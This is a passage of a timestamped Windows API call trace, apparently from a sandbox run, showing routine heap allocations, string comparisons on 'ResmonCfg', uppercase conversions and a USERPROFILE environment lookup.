lpString1="mon.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="on.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="monCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="onCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0200.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0200.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0200.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0200.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0200.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0200.119] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0200.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0200.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0200.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0200.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0200.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0200.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0200.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0200.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0200.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0200.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0200.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0200.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0200.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x22) returned 0x2a69af0 [0200.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Resmon.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esmon.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smon.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mon.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="on.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="monCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0200.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a731e8 [0200.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a731e8 | out: hHeap=0x2af0000) returned 1 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0200.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0200.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0200.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0200.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0200.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0200.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0200.121] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0200.121] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0200.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0200.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0200.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0200.121] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0200.122] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0200.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0200.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0200.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0200.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0200.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0200.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0200.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0200.123] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0200.123] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0200.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0200.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0200.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0200.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0200.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0200.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0200.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0200.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0200.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0200.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0200.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0200.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0200.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0200.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0200.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0200.126] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0200.126] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0200.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0200.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0200.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0200.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0200.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0200.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0200.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0200.126] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0200.126] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0200.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0200.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 